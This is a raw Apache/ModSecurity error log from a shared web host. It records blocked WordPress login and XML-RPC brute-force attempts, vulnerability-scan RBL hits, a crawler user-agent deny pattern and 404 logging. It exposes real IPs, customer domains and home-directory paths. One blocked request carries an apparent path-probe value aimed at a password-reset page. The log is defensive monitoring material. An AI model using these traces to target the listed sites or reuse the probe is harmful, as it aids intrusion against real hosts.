[Tue May 26 13:56:19.129672 2026] [security2:error] [pid 555743:tid 555953] [client 129.222.147.134:4987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZK8jqAquC0YaxQjDGnwAAAVo"]
[Tue May 26 13:56:19.129853 2026] [security2:error] [pid 555743:tid 555953] [client 129.222.147.134:4987] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZK8jqAquC0YaxQjDGnwAAAVo"]
[Tue May 26 13:56:19.178532 2026] [core:error] [pid 555743:tid 555899] [client 172.121.219.195:51168] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:56:19.178553 2026] [core:error] [pid 555743:tid 555899] [client 172.121.219.195:51168] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:56:19.526521 2026] [security2:error] [pid 555743:tid 555925] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZK8jqAquC0YaxQjDGngAAAT4"]
[Tue May 26 13:56:19.644259 2026] [core:error] [pid 560287:tid 560439] [client 172.121.219.195:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:56:19.644280 2026] [core:error] [pid 560287:tid 560439] [client 172.121.219.195:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:56:21.172726 2026] [security2:error] [pid 560287:tid 560529] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZLJmX5s6sDS3wJVcp4wAAAO8"]
[Tue May 26 13:56:23.396986 2026] [security2:error] [pid 555743:tid 555945] [client 106.192.248.115:59322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZL8jqAquC0YaxQjDGvgAAAVI"]
[Tue May 26 13:56:23.398754 2026] [security2:error] [pid 555743:tid 555945] [client 106.192.248.115:59322] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZL8jqAquC0YaxQjDGvgAAAVI"]
[Tue May 26 13:56:23.580734 2026] [security2:error] [pid 555743:tid 555980] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZL8jqAquC0YaxQjDGuAAAAXU"]
[Tue May 26 13:56:24.866040 2026] [security2:error] [pid 555743:tid 555951] [client 47.128.53.81:33668] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/robots.txt"] [unique_id "ahVZMMjqAquC0YaxQjDGyAAAAVg"]
[Tue May 26 13:56:25.304992 2026] [security2:error] [pid 555743:tid 555909] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZMMjqAquC0YaxQjDGygAAAS4"]
[Tue May 26 13:56:26.605339 2026] [security2:error] [pid 560287:tid 560345] [remote 74.7.241.58:53094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVZMpmX5s6sDS3wJVcqEgAAzTk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 13:56:27.004775 2026] [security2:error] [pid 560287:tid 560448] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZMpmX5s6sDS3wJVcqDwAAAKI"]
[Tue May 26 13:56:27.622095 2026] [security2:error] [pid 560287:tid 560344] [remote 54.36.102.244:57504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVZM5mX5s6sDS3wJVcqIAAA6zg"]
[Tue May 26 13:56:27.932074 2026] [security2:error] [pid 560287:tid 560360] [remote 147.93.168.136:39552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.168.93.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVZM5mX5s6sDS3wJVcqIQAArUc"]
[Tue May 26 13:56:28.062717 2026] [security2:error] [pid 555743:tid 555886] [client 202.141.30.10:35441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZM8jqAquC0YaxQjDG4wAAARc"]
[Tue May 26 13:56:28.062936 2026] [security2:error] [pid 555743:tid 555886] [client 202.141.30.10:35441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZM8jqAquC0YaxQjDG4wAAARc"]
[Tue May 26 13:56:28.086084 2026] [autoindex:error] [pid 560287:tid 560423] [client 159.89.40.91:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:56:28.257058 2026] [security2:error] [pid 560287:tid 560426] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZM5mX5s6sDS3wJVcqJgAAAI0"]
[Tue May 26 13:56:29.301892 2026] [security2:error] [pid 560287:tid 560549] [client 129.222.147.134:34259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZNZmX5s6sDS3wJVcqMwAAAQE"]
[Tue May 26 13:56:29.322870 2026] [security2:error] [pid 560287:tid 560549] [client 129.222.147.134:34259] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZNZmX5s6sDS3wJVcqMwAAAQE"]
[Tue May 26 13:56:30.524577 2026] [security2:error] [pid 555743:tid 555946] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZNsjqAquC0YaxQjDG8QAAAVM"]
[Tue May 26 13:56:31.609468 2026] [security2:error] [pid 560287:tid 560496] [client 114.119.133.192:39783] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.aastha-enterprises.com"] [uri "/documents/Documents_Required_for_Customs_Clearance.docx"] [unique_id "ahVZN5mX5s6sDS3wJVcqOwAAAM8"], referer: https://www.aastha-enterprises.com/documents/Documents_Required_for_Customs_Clearance.docx
[Tue May 26 13:56:32.240057 2026] [security2:error] [pid 555743:tid 555928] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZN8jqAquC0YaxQjDG-wAAAUE"]
[Tue May 26 13:56:32.857823 2026] [security2:error] [pid 560287:tid 560374] [remote 95.216.117.13:40160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVZOJmX5s6sDS3wJVcqTwAA21U"]
[Tue May 26 13:56:33.191563 2026] [security2:error] [pid 560287:tid 560529] [client 157.33.38.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZOJmX5s6sDS3wJVcqVQAAAO8"]
[Tue May 26 13:56:33.895395 2026] [security2:error] [pid 560287:tid 560490] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZOZmX5s6sDS3wJVcqYgAAAMk"]
[Tue May 26 13:56:34.307766 2026] [security2:error] [pid 555743:tid 555952] [client 144.76.32.237:27786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.32.76.144.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahVZOsjqAquC0YaxQjDHBwAAAVk"]
[Tue May 26 13:56:34.697476 2026] [security2:error] [pid 560287:tid 560549] [client 106.192.248.115:59626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZOpmX5s6sDS3wJVcqcAAAAQE"]
[Tue May 26 13:56:34.697690 2026] [security2:error] [pid 560287:tid 560549] [client 106.192.248.115:59626] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZOpmX5s6sDS3wJVcqcAAAAQE"]
[Tue May 26 13:56:35.136324 2026] [security2:error] [pid 560287:tid 560439] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZOpmX5s6sDS3wJVcqcwAAAJo"]
[Tue May 26 13:56:37.006524 2026] [security2:error] [pid 560287:tid 560506] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZPJmX5s6sDS3wJVcqgQAAANg"]
[Tue May 26 13:56:38.845801 2026] [security2:error] [pid 560287:tid 560551] [client 202.141.30.10:35582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZPpmX5s6sDS3wJVcqmQAAAQM"]
[Tue May 26 13:56:38.845934 2026] [security2:error] [pid 560287:tid 560551] [client 202.141.30.10:35582] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZPpmX5s6sDS3wJVcqmQAAAQM"]
[Tue May 26 13:56:39.209961 2026] [security2:error] [pid 560287:tid 560485] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZPpmX5s6sDS3wJVcqmAAAAMQ"]
[Tue May 26 13:56:39.665656 2026] [security2:error] [pid 560287:tid 560499] [client 129.222.147.134:44270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZP5mX5s6sDS3wJVcqnwAAANI"]
[Tue May 26 13:56:39.665830 2026] [security2:error] [pid 560287:tid 560499] [client 129.222.147.134:44270] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZP5mX5s6sDS3wJVcqnwAAANI"]
[Tue May 26 13:56:41.091329 2026] [security2:error] [pid 560287:tid 560473] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZQJmX5s6sDS3wJVcqsAAAALk"]
[Tue May 26 13:56:42.710557 2026] [security2:error] [pid 560287:tid 560532] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZQpmX5s6sDS3wJVcqwQAAAPI"]
[Tue May 26 13:56:43.991519 2026] [security2:error] [pid 555743:tid 555998] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZQ8jqAquC0YaxQjDHPgAAAYc"]
[Tue May 26 13:56:44.314122 2026] [security2:error] [pid 560287:tid 560527] [client 185.191.171.3:55916] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/glow/list/"] [unique_id "ahVZRJmX5s6sDS3wJVcq2wAAAO0"]
[Tue May 26 13:56:44.314267 2026] [security2:error] [pid 560287:tid 560527] [client 185.191.171.3:55916] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/glow/list/"] [unique_id "ahVZRJmX5s6sDS3wJVcq2wAAAO0"]
[Tue May 26 13:56:44.525546 2026] [security2:error] [pid 560287:tid 560492] [client 106.192.248.115:59937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZRJmX5s6sDS3wJVcq3wAAAMs"]
[Tue May 26 13:56:44.535653 2026] [security2:error] [pid 560287:tid 560492] [client 106.192.248.115:59937] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZRJmX5s6sDS3wJVcq3wAAAMs"]
[Tue May 26 13:56:45.677237 2026] [security2:error] [pid 560287:tid 560450] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZRZmX5s6sDS3wJVcq7AAAAKQ"]
[Tue May 26 13:56:47.758042 2026] [security2:error] [pid 560287:tid 560545] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZR5mX5s6sDS3wJVcrBQAAAP0"]
[Tue May 26 13:56:48.717454 2026] [security2:error] [pid 560287:tid 560419] [client 173.239.254.137:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVZR5mX5s6sDS3wJVcrFAAAhmA"]
[Tue May 26 13:56:49.578674 2026] [security2:error] [pid 560287:tid 560491] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZSZmX5s6sDS3wJVcrLAAAAMo"]
[Tue May 26 13:56:49.660012 2026] [security2:error] [pid 560287:tid 560447] [client 202.141.30.10:35547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZSZmX5s6sDS3wJVcrMwAAAKE"]
[Tue May 26 13:56:49.660658 2026] [security2:error] [pid 560287:tid 560447] [client 202.141.30.10:35547] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZSZmX5s6sDS3wJVcrMwAAAKE"]
[Tue May 26 13:56:49.862729 2026] [security2:error] [pid 560287:tid 560489] [client 129.222.147.134:6658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZSZmX5s6sDS3wJVcrNQAAAMg"]
[Tue May 26 13:56:49.873147 2026] [security2:error] [pid 560287:tid 560489] [client 129.222.147.134:6658] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZSZmX5s6sDS3wJVcrNQAAAMg"]
[Tue May 26 13:56:49.975871 2026] [security2:error] [pid 560287:tid 560472] [client 172.98.32.47:40693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVZSZmX5s6sDS3wJVcrNAAAALg"]
[Tue May 26 13:56:50.174265 2026] [security2:error] [pid 555743:tid 555823] [remote 167.71.130.119:56338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVZSsjqAquC0YaxQjDHUwABdE8"]
[Tue May 26 13:56:51.327735 2026] [security2:error] [pid 560287:tid 560497] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZSpmX5s6sDS3wJVcrRgAAANA"]
[Tue May 26 13:56:52.526658 2026] [security2:error] [pid 555743:tid 555917] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZTMjqAquC0YaxQjDHbAAAATY"]
[Tue May 26 13:56:54.751654 2026] [security2:error] [pid 560287:tid 560424] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZTpmX5s6sDS3wJVcrdQAAAIs"]
[Tue May 26 13:56:55.290318 2026] [security2:error] [pid 560287:tid 560515] [client 106.192.248.115:60248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZT5mX5s6sDS3wJVcregAAAOE"]
[Tue May 26 13:56:55.293996 2026] [security2:error] [pid 560287:tid 560515] [client 106.192.248.115:60248] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZT5mX5s6sDS3wJVcregAAAOE"]
[Tue May 26 13:56:56.447927 2026] [security2:error] [pid 560287:tid 560513] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZUJmX5s6sDS3wJVcrgwAAAN8"]
[Tue May 26 13:56:56.598789 2026] [security2:error] [pid 560287:tid 560545] [client 14.164.212.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZUJmX5s6sDS3wJVcrhgAAAP0"]
[Tue May 26 13:56:57.551560 2026] [security2:error] [pid 555743:tid 555984] [client 114.119.128.143:24985] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "christinaspromotions.com"] [uri "/golf-tournament/corporate-golf-tournament-with-western-technical-college/"] [unique_id "ahVZUcjqAquC0YaxQjDHngAAAXk"], referer: http://christinaspromotions.com/
[Tue May 26 13:56:58.241717 2026] [security2:error] [pid 560287:tid 560530] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZUZmX5s6sDS3wJVcrkgAAAPA"]
